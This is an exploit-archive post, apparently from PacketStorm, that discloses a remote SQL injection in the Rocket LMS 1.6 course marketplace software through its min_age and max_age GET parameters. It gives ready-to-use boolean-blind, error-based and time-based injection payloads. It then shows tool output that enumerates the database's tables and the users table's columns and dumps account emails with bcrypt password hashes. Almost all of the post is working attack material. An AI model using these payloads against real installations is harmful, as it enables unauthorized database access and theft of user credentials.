## https://sploitus.com/exploit?id=PACKETSTORM:168402
C r a C k E r  
T H E C R A C K O F E T E R N A L M I G H T  
  
From The Ashes and Dust Rises An Unimaginable crack....  
  
[ Exploits ]  
  
Author : CraCkEr  
Website : rocket-soft.org  
Vendor : RocketSoft  
Software : Rocket LMS v 1.6  
Vuln Type: Remote SQL Injection  
Method : GET  
Impact : Database Access  
  
Rocket LMS - Learning Management System  
is an online course marketplace with a pile of features that helps you to run your online education business easily  
  
B4nks-NET irc.b4nks.tk #unix  
  
Release Notes:  
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.  
  
Greets:  
  
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL   
Ivo @palaziv  
  
CryptoJob (Twitter) twitter.com/CryptozJob  
  
© CraCkEr 2022  
  
  
GET parameter 'min_age' is vulnerable  
  
---  
Parameter: min_age (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=  
  
Type: error-based  
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=  
---  
  
  
GET parameter 'max_age' is vulnerable  
  
---  
Parameter: max_age (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=  
  
Type: error-based  
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=  
---   
  
  
[+] Starting the Attack  
  
[INFO] fetching current database  
[INFO] the back-end DBMS is MySQL  
web application technology: Apache 2, PHP 7.4.30  
back-end DBMS: MySQL >= 5.6  
  
current database: 'admin_learn'  
  
  
[INFO] fetching tables for database: 'admin_learn'  
  
Database: admin_learn  
[184 tables]  
+------------------------------------------------+  
| groups |  
| accounting |  
| advertising_banners |  
| advertising_banners_translations |  
| affiliates |  
| affiliates_codes |  
| agora_history |  
| badge_translations |  
| badges |  
| become_instructors |  
| blog |  
| blog_categories |  
| blog_translations |  
| bundle_filter_option |  
| bundle_translations |  
| bundle_webinars |  
| bundles |  
| cart |  
| categories |  
| category_translations |  
| certificate_template_translations |  
| certificates |  
| certificates_templates |  
| comments |  
| comments_reports |  
| contacts |  
| course_forum_answers |  
| course_forums |  
| course_learning |  
| course_noticeboard_status |  
| course_noticeboards |  
| delete_account_requests |  
| discount_categories |  
| discount_courses |  
| discount_groups |  
| discount_users |  
| discounts |  
| faq_translations |  
| faqs |  
| favorites |  
| feature_webinar_translations |  
| feature_webinars |  
| file_translations |  
| files |  
| filter_option_translations |  
| filter_options |  
| filter_translations |  
| filters |  
| follows |  
| forum_featured_topics |  
| forum_recommended_topic_items |  
| forum_recommended_topics |  
| forum_topic_attachments |  
| forum_topic_bookmarks |  
| forum_topic_likes |  
| forum_topic_posts |  
| forum_topic_reports |  
| forum_topics |  
| forum_translations |  
| forums |  
| group_users |  
| groups_registration_packages |  
| home_sections |  
| jazzcash_transactions |  
| meeting_times |  
| meetings |  
| migrations |  
| navbar_button_translations |  
| navbar_buttons |  
| newsletters |  
| newsletters_history |  
| noticeboards |  
| noticeboards_status |  
| notification_templates |  
| notifications |  
| notifications_status |  
| offline_payments |  
| order_items |  
| orders |  
| page_translations |  
| pages |  
| password_resets |  
| payku_payments |  
| payku_transactions |  
| payment_channels |  
| payouts |  
| payu_transactions |  
| permissions |  
| prerequisites |  
| product_categories |  
| product_category_translations |  
| product_discounts |  
| product_faq_translations |  
| product_faqs |  
| product_file_translations |  
| product_files |  
| product_filter_option_translations |  
| product_filter_options |  
| product_filter_translations |  
| product_filters |  
| product_media |  
| product_orders |  
| product_reviews |  
| product_selected_filter_options |  
| product_selected_specification_multi_values |  
| product_selected_specification_translations |  
| product_selected_specifications |  
| product_specification_categories |  
| product_specification_multi_value_translations |  
| product_specification_multi_values |  
| product_specification_translations |  
| product_specifications |  
| product_translations |  
| products |  
| promotion_translations |  
| promotions |  
| purchases |  
| quiz_question_translations |  
| quiz_translations |  
| quizzes |  
| quizzes_questions |  
| quizzes_questions_answer_translations |  
| quizzes_questions_answers |  
| quizzes_results |  
| rating |  
| regions |  
| registration_packages |  
| registration_packages_translations |  
| reserve_meetings |  
| rewards |  
| rewards_accounting |  
| roles |  
| sales |  
| sales_log |  
| sections |  
| session_reminds |  
| session_translations |  
| sessions |  
| setting_translations |  
| settings |  
| special_offers |  
| subscribe_reminds |  
| subscribe_translations |  
| subscribe_uses |  
| subscribes |  
| support_conversations |  
| support_department_translations |  
| support_departments |  
| supports |  
| tags |  
| testimonial_translations |  
| testimonials |  
| text_lesson_translations |  
| text_lessons |  
| text_lessons_attachments |  
| ticket_translations |  
| ticket_users |  
| tickets |  
| trend_categories |  
| users |  
| users_badges |  
| users_cookie_security |  
| users_manual_purchase |  
| users_metas |  
| users_occupations |  
| users_registration_packages |  
| users_zoom_api |  
| verifications |  
| webinar_assignment_attachments |  
| webinar_assignment_history |  
| webinar_assignment_history_messages |  
| webinar_assignment_translations |  
| webinar_assignments |  
| webinar_chapter_items |  
| webinar_chapter_translations |  
| webinar_chapters |  
| webinar_extra_description_translations |  
| webinar_extra_descriptions |  
| webinar_filter_option |  
| webinar_partner_teacher |  
| webinar_reports |  
| webinar_reviews |  
| webinar_translations |  
| webinars |  
+------------------------------------------------+  
  
  
[INFO] fetching columns for table 'users' in database 'admin_learn'  
  
Database: admin_learn  
Table: users  
[49 columns]  
  
+--------------------+-------------------------------------+  
| Column | Type |  
+--------------------+-------------------------------------+  
| language | varchar(255) |  
| about | text |  
| access_content | tinyint(1) |  
| account_id | varchar(128) |  
| account_type | varchar(128) |  
| address | varchar(255) |  
| affiliate | tinyint(1) |  
| avatar | varchar(255) |  
| avatar_settings | varchar(255) |  
| ban | tinyint(1) |  
| ban_end_at | int(10) unsigned |  
| ban_start_at | int(10) unsigned |  
| bio | varchar(128) |  
| can_create_store | tinyint(1) |  
| certificate | varchar(128) |  
| city_id | int(10) unsigned |  
| commission | int(10) unsigned |  
| country_id | int(10) unsigned |  
| cover_img | varchar(255) |  
| created_at | int(11) |  
| deleted_at | int(11) |  
| district_id | int(10) unsigned |  
| email | varchar(255) |  
| facebook_id | varchar(255) |  
| financial_approval | tinyint(1) |  
| full_name | varchar(128) |  
| google_id | varchar(255) |  
| headline | varchar(255) |  
| iban | varchar(128) |  
| id | int(10) unsigned |  
| identity_scan | varchar(128) |  
| level_of_training | bit(3) |  
| location | point |  
| meeting_type | enum('all','in_person','online') |  
| mobile | varchar(32) |  
| newsletter | tinyint(1) |  
| offline | tinyint(1) |  
| offline_message | text |  
| organ_id | int(11) |  
| password | varchar(255) |  
| province_id | int(10) unsigned |  
| public_message | tinyint(1) |  
| remember_token | varchar(255) |  
| role_id | int(10) unsigned |  
| role_name | varchar(64) |  
| status | enum('active','pending','inactive') |  
| timezone | varchar(255) |  
| updated_at | int(11) |  
| verified | tinyint(1) |  
+--------------------+-------------------------------------+  
  
  
[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'  
  
Database: admin_learn  
Table: users  
[4 entries]  
  
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+  
| id | account_id | account_type | email | password |  
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+  
| 1 | NULL | NULL | admin@demo.com | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |  
| 867 | NULL | NULL | organization@demo.com | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |  
| 995 | NULL | NULL | student@demo.com | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |  
| 1015 | NULL | NULL | instructor@demo.com | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |  
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+  
  
  
[-] Done